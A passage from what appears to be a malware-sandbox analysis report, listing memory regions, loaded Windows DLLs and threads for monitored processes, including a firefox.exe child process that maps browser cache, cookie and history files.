0x74100000 end_va = 0x74107fff entry_point = 0x74100000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 3437 start_va = 0x74120000 end_va = 0x74126fff entry_point = 0x74120000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3438 start_va = 0x74130000 end_va = 0x7414bfff entry_point = 0x74130000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3439 start_va = 0x74170000 end_va = 0x741b6fff entry_point = 0x74170000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3440 start_va = 0x741d0000 end_va = 0x741d8fff entry_point = 0x741d0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3441 start_va = 0x74240000 end_va = 0x7424ffff entry_point = 0x74240000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3442 start_va = 0x74880000 end_va = 0x74887fff entry_point = 0x74880000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3443 start_va = 0x74890000 end_va = 0x748a1fff entry_point = 0x74890000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3444 start_va = 0x748c0000 end_va = 0x748cffff entry_point = 0x748c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3445 start_va = 0x74a00000 end_va = 0x74a12fff entry_point = 0x74a00000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3446 start_va = 0x75420000 end_va = 0x75428fff entry_point = 0x75420000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3447 start_va = 0x754b0000 end_va = 0x754b4fff entry_point = 0x754b0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3448 start_va = 0x75560000 end_va = 0x75575fff entry_point = 0x75560000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3449 start_va = 0x75580000 end_va = 0x75596fff entry_point = 0x75580000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3450 start_va = 0x75670000 end_va = 0x75677fff entry_point = 0x75670000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3451 start_va = 0x75740000 end_va = 0x7577afff entry_point = 0x75740000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3452 start_va = 0x75820000 end_va = 0x75863fff entry_point = 0x75820000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3453 start_va = 0x75950000 end_va = 0x75955fff entry_point = 0x75950000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3454 start_va = 0x75960000 end_va = 0x7599bfff entry_point = 0x75960000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3455 start_va = 0x759a0000 end_va = 0x759b5fff entry_point = 0x759a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3456 start_va = 0x75b60000 end_va = 0x75ba1fff entry_point = 0x75b60000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3457 start_va = 0x75de0000 end_va = 0x75de7fff entry_point = 0x75de0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3458 start_va = 0x75e00000 end_va = 0x75e1afff entry_point = 0x75e00000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3459 start_va = 0x75e20000 end_va = 0x75e2bfff entry_point = 0x75e20000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3460 start_va = 0x75e30000 end_va = 0x75e8efff entry_point = 0x75e30000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3461 start_va = 0x75ec0000 end_va = 0x75ecdfff entry_point = 0x75ec0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3462 start_va = 0x75ed0000 end_va = 0x75edafff entry_point = 0x75ed0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3463 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3464 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3465 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3466 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3467 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3468 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3469 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3470 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3471 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3472 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3473 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3474 start_va = 0x77600000 end_va = 0x77682fff entry_point = 0x77600000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3475 start_va = 0x77690000 end_va = 0x7771efff entry_point = 0x77690000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3476 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3477 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3478 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3479 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3480 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3481 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3482 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3483 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3484 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 3485 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 3486 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 3487 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 3488 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 3489 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3490 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 3491 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 3492 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 3493 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 3494 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 3495 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3496 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 3497 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 3498 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3499 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 3500 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 3501 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3502 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 175 os_tid = 0xe58 Thread: id = 176 os_tid = 0xd58 Thread: id = 177 os_tid = 0xd54 Thread: id = 178 os_tid = 0x4f4 Thread: id = 179 os_tid = 0x28c Thread: id = 180 os_tid = 0x230 Thread: id = 181 os_tid = 0x150 Thread: id = 182 os_tid = 0xf0 Thread: id = 183 os_tid = 0x7e0 Thread: id = 184 os_tid = 0x7c4 Thread: id = 185 os_tid = 0x5e4 Thread: id = 186 os_tid = 0x5ac Thread: id = 187 os_tid = 0x420 Thread: id = 188 os_tid = 0x41c Thread: id = 189 os_tid = 0x414 Thread: id = 190 os_tid = 0x410 Thread: id = 191 os_tid = 0x40c Thread: id = 192 os_tid = 0x3f8 Thread: id = 214 os_tid = 0x750 Process: id = "76" image_name = "firefox.exe" filename = "c:\\program files\\mozilla firefox\\firefox.exe" page_root = "0x7ef4f680" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xaac" cmd_line = "\"c:\\program files\\mozilla firefox\\firefox.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3519 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3520 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3521 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3522 start_va = 0x140000 end_va = 0x142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3523 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3524 start_va = 0x1050000 end_va = 0x1093fff entry_point = 0x1050000 region_type = mapped_file name = "firefox.exe" filename = "\\Program Files\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files\\mozilla firefox\\firefox.exe") Region: id = 3525 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3526 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3527 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3528 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3529 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3530 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3531 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 3532 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3533 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3534 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3535 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3536 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3537 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3538 start_va = 0x6cd50000 end_va = 0x6ce0dfff entry_point = 0x6cd50000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcr100.dll") Region: id = 3539 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3540 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3541 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3542 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3543 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3544 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3545 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 3546 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3547 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3548 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3549 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3550 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 3551 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 3552 start_va = 0x10a0000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 3553 start_va = 0x76600000 end_va = 0x766f4fff entry_point = 0x76600000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3554 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3555 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3556 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3557 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3558 start_va = 0x77830000 end_va = 0x77965fff entry_point = 0x77830000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3559 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3560 start_va = 0x77690000 end_va = 0x7771efff entry_point = 0x77690000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3561 start_va = 0x76050000 end_va = 0x7616cfff entry_point = 0x76050000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3562 start_va = 0x75f40000 end_va = 0x75f4bfff entry_point = 0x75f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3563 start_va = 0x763f0000 end_va = 0x765eafff entry_point = 0x763f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3564 start_va = 0x5c0000 end_va = 0x88efff entry_point = 0x5c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3565 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3566 start_va = 0x74eb0000 end_va = 0x7504dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 3567 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x2f0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3568 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 3569 start_va = 0x75e00000 end_va = 0x75e1afff entry_point = 0x75e00000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3570 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3571 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3572 start_va = 0x75ed0000 end_va = 0x75edafff entry_point = 0x75ed0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3573 start_va = 0x380000 end_va = 0x3abfff entry_point = 0x380000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 3574 start_va = 0x350000 end_va = 0x357fff entry_point = 0x350000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 3575 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x360000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 3576 start_va = 0x8f0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 3577 start_va = 0x74550000 end_va = 0x74570fff entry_point = 0x74550000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3578 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 3579 start_va = 0x763a0000 end_va = 0x763e4fff entry_point = 0x763a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3580 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3581 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3582 start_va = 0x9f0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 3583 start_va = 0x75820000 end_va = 0x75863fff entry_point = 0x75820000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3584 start_va = 0x9f0000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 3585 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 3586 start_va = 0x74130000 end_va = 0x7414bfff entry_point = 0x74130000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3587 start_va = 0x74120000 end_va = 0x74126fff entry_point = 0x74120000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3588 start_va = 0xb90000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 3589 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 3590 start_va = 0x73750000 end_va = 0x737a1fff entry_point = 0x73750000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 3591 start_va = 0x73730000 end_va = 0x73744fff entry_point = 0x73730000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 3592 start_va 